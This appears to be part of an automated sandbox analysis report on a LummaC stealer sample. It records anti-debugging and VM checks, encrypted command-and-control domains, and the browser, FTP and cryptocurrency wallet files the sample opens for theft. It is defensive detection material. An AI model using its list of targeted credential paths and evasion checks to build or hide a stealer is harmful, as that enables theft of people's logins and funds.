            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 533E43 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6F9B71 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 77E989 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7556Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7568Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, 00000000.00000002.1851706509.00000000006D1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852469176.000000000128A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000128A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852411307.000000000120E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000002.1851706509.00000000006D1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.1690697919.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852469176.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.0000000001271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (window names)
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: clearancek.site
            Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: licendfilteo.site
            Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: spirittunek.stor
            Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: bathdoomgaz.stor
            Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: studennotediw.stor
            Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: dissapoiznw.stor
            Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: eaglepawnoy.stor
            Source: file.exe, 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: mobbipenju.stor
            Source: file.exe, 00000000.00000002.1851840993.0000000000715000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: rProgram Manager
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: file.exe, 00000000.00000002.1853114151.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1857713084.0000000005BD5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851374834.0000000005BD1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851390062.0000000005BD4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788509424.00000000012E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7436, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: file.exeString found in binary or memory: Wallets/Electrum
            Source: file.exeString found in binary or memory: Wallets/ElectronCash
            Source: file.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: file.exeString found in binary or memory: window-state.json
            Source: file.exeString found in binary or memory: ExodusWeb3
            Source: file.exeString found in binary or memory: Wallets/Ethereum
            Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exeString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
